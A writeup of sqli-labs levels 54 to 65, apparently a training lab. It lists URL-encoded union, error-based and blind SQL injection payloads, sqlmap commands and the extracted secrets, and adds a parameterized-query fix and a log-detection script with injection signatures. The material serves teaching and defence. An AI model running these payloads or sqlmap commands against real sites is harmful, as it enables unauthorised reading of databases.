sqlilab-Less-54-65-writeup

    Less-54: GET request, union query, 10 steps to the key, single quote

    When doing union-query injection, note that the early steps (checking that the quote is closed correctly, finding the column count) must use an id that actually exists in the backend database; for testing here id=1, 2 or 3 works, other numbers show nothing. Once you move on to the later steps such as reading table names, a non-existent id is fine.

    Check that the closing method works
    ?id=1'--+

    Determine the column count
    ?id=1' order by 3--+
    ?id=1' order by 4--+

    Identify the columns that display output
    ?id=-1' union select 1,2,3 --+
    From the output, columns 2 and 3 are displayed

    Get the table names
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    Output:
    Your Login name:2
    Your Password:BROZHOX7ME

    Get the column names
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28column_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x42524f5a484f58374d45%29--+

    BROZHOX7ME ---> hex 42524f5a484f58374d45 (online converter: https://www.bejson.com/convert/ox2str/)

    Output:
    Your Login name:2
    Your Password:id
    sessid
    secret_FDK5
    tryy

    Get the column values
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28secret_FDK5%29+FROM+BROZHOX7ME%29--+

    Output:
    Your Login name:2
    Your Password:oNf3esAKnoNVUbViCYCbGPzv
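To show why the Less-54 query is exploitable and how it is fixed, here is an added example (not code from the page or from sqli-labs): a constructed sqlite3 stand-in for the lab's tables, the string-spliced lookup the lab reproduces, and the parameterized version that makes the same payload inert. The sample rows, the sqlite3 substitution for MySQL and the lookup function names are assumptions; the table and column names are the ones recovered above.

```python
import sqlite3

# Constructed stand-in for the lab's database (not the page's code). The lab runs
# MySQL; sqlite3 is used here so the example runs offline. Table and column names
# are the ones recovered in the Less-54 walkthrough above.
SECRET_TABLE = "BROZHOX7ME"
SECRET_COLUMN = "secret_FDK5"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
        CREATE TABLE {SECRET_TABLE}(id INTEGER, sessid TEXT, {SECRET_COLUMN} TEXT, tryy TEXT);
        INSERT INTO {SECRET_TABLE} VALUES (1, 'sess-1', 'constructed-secret', '0');
    """)
    return conn

def lookup_vulnerable(conn, user_id):
    # The pattern the lab reproduces: the request parameter is spliced into the
    # SQL text inside single quotes, so a quote in the input ends the literal and
    # whatever follows (a UNION, a comment marker) becomes part of the statement.
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 1"
    return conn.execute(sql).fetchone()

def lookup_parameterized(conn, user_id):
    # The fix: the value is bound by the driver and never parsed as SQL, so the
    # whole input is compared against id as one value and the UNION text is inert.
    sql = "SELECT * FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchone()

# The Less-54 column-value payload, percent-decoded, for use with both lookups.
UNION_PAYLOAD = f"-1' union select 1,2,(SELECT GROUP_CONCAT({SECRET_COLUMN}) FROM {SECRET_TABLE})-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterized:", lookup_parameterized(db, UNION_PAYLOAD))
```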

    Less-55: GET request, union query, 14 steps to the key, parentheses

    Same payload as Less-54; the closing changes from a single quote to a parenthesis

    Check that the closing method works
    ?id=1)--+

    http://106.54.35.126/Less-55/?id=-1) union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    The other steps are the same as Less-54


    Less-56: GET request, union query, 14 steps to the key, single quote and parenthesis

    Check that the closing method works
    ?id=1')--+

    http://106.54.35.126/Less-56/?id=-1%27%29%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    The other steps are the same as Less-54


    Less-57: GET request, union query, 14 steps to the key, double quote

    Check that the closing method works
    ?id=1"--+

    http://106.54.35.126/Less-57/?id=-1%22%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+


    Less-58: GET request, 5 steps to the key, single quote

    A union query cannot be used on this level, because the result array that is displayed gets reversed, so error-based injection works well here

    http://106.54.35.126/Less-58/?id=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-59: GET request, 5 steps to the key

    Same as Less-58; the id is an integer, no single quote

    http://106.54.35.126/Less-59/?id=1+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-60: GET request, 5 steps to the key

    Same as Less-58; the closing is a double quote and a parenthesis

    http://106.54.35.126/Less-60/?id=1%22%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-61: GET request, 5 steps to the key

    Same as Less-58; the closing is a single quote and two parentheses

    http://106.54.35.126/Less-61/?id=1%27%29%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-62: GET request, 5 steps to the key

    Same as Less-58, but error display is turned off, so only boolean-based and time-based blind injection are possible here; the closing is a single quote and one parenthesis

    Use sqlmap for boolean-based blind injection (the second command uses the time-based technique instead)

    python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --level=3 --risk=3 --dbs --batch

    Less-63: GET request, 5 steps to the key

    Same as Less-58, but error display is turned off, so only boolean-based and time-based blind injection are possible here; the closing is a single quote

    Use sqlmap for boolean-based blind injection

    python sqlmap.py -u http://106.54.35.126/Less-63/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    Less-64: GET request, 5 steps to the key

    Same as Less-58, but error display is turned off, so only boolean-based and time-based blind injection are possible here; the closing is two parentheses

    Use sqlmap for boolean-based blind injection

    python sqlmap.py -u http://106.54.35.126/Less-64/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    Less-65: GET request, 5 steps to the key

    Same as Less-58, but error display is turned off, so only boolean-based and time-based blind injection are possible here; the closing is a single quote and a parenthesis

    Use sqlmap for boolean-based blind injection

    python sqlmap.py -u http://106.54.35.126/Less-65/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
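From the defender's side, the requests in this writeup (the union and information_schema reads of Less-54, the hex-encoded table name behind the 42524f5a484f58374d45 conversion, the FLOOR(RAND()) error trick of Less-58, and the boolean and time probes sqlmap sends for Less-62 to 65) are all visible in the web server's access log once the query string is decoded. The following is an added example, not code from the page or from sqlmap: it parses constructed access-log lines, percent-decodes each request, renders MySQL 0x... literals back to text, and tags each source IP with the techniques seen. The log lines, IPs, signature set and function names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus
# Constructed access-log lines (not from the page). The query strings mimic the
# writeup's requests: a UNION read, the FLOOR(RAND()) error trick, sqlmap-style probes.
LOG_LINES = [
    '10.0.0.5 - - [01/Oct/2020:10:00:01 +0800] "GET /Less-54/?id=1 HTTP/1.1" 200 1234',
    '10.0.0.5 - - [01/Oct/2020:10:00:02 +0800] "GET /Less-54/?id=-1%27+union+select+1,2,%28SELECT+'
    'GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES%29--+ HTTP/1.1" 200 1300',
    '10.0.0.5 - - [01/Oct/2020:10:00:03 +0800] "GET /Less-58/?id=1%27+AND+%28SELECT+COUNT%28*%29,FLOOR%28RAND%280%29*2%29%29x--+ HTTP/1.1" 500 800',
    '10.0.0.9 - - [01/Oct/2020:10:01:00 +0800] "GET /Less-62/?id=1%27%29+AND+4711=4711--+ HTTP/1.1" 200 1234',
    '10.0.0.9 - - [01/Oct/2020:10:01:00 +0800] "GET /Less-62/?id=1%27%29+AND+4711=4712--+ HTTP/1.1" 200 1100',
    '10.0.0.9 - - [01/Oct/2020:10:01:01 +0800] "GET /Less-62/?id=1%27%29+AND+SLEEP%285%29--+ HTTP/1.1" 200 1100',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')
HEX_LITERAL_RE = re.compile(r"\b0x([0-9a-f]+)\b", re.I)

# One signature per technique in the writeup, matched against the decoded, lowercased
# query so percent-encoding and '+' cannot hide it (sqlmap --random-agent defeats UA matching).
SIGNATURES = {
    "union": re.compile(r"union\s+(all\s+)?select"),
    "schema_read": re.compile(r"information_schema"),
    "error_based": re.compile(r"floor\(\s*rand\("),
    "boolean": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
}

def decode_hex_literals(query):
    # Render MySQL 0x... string literals (used above to pass names without quotes) as text.
    def repl(m):
        try:
            return repr(bytes.fromhex(m.group(1)).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # odd length or non-text: leave the literal as-is
    return HEX_LITERAL_RE.sub(repl, query)

def decode_query(target):
    return decode_hex_literals(unquote_plus(target.partition("?")[2]))

def classify_request(target):
    query = decode_query(target).lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def analyze(lines):
    # {source ip: sorted technique names} for every source with at least one hit.
    hits = defaultdict(set)
    for m in filter(None, map(REQUEST_RE.match, lines)):
        hits[m.group(1)].update(classify_request(m.group(2)))
    return {ip: sorted(tags) for ip, tags in hits.items() if tags}
```

Sources tagged with several techniques in a short window, or with any hit at all on an id parameter, are the ones worth pulling full request bodies for.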

    A life adrift needs constant effort before the blurred ambitions in the distance come into view!
    Original article: https://www.cnblogs.com/autopwn/p/13730992.html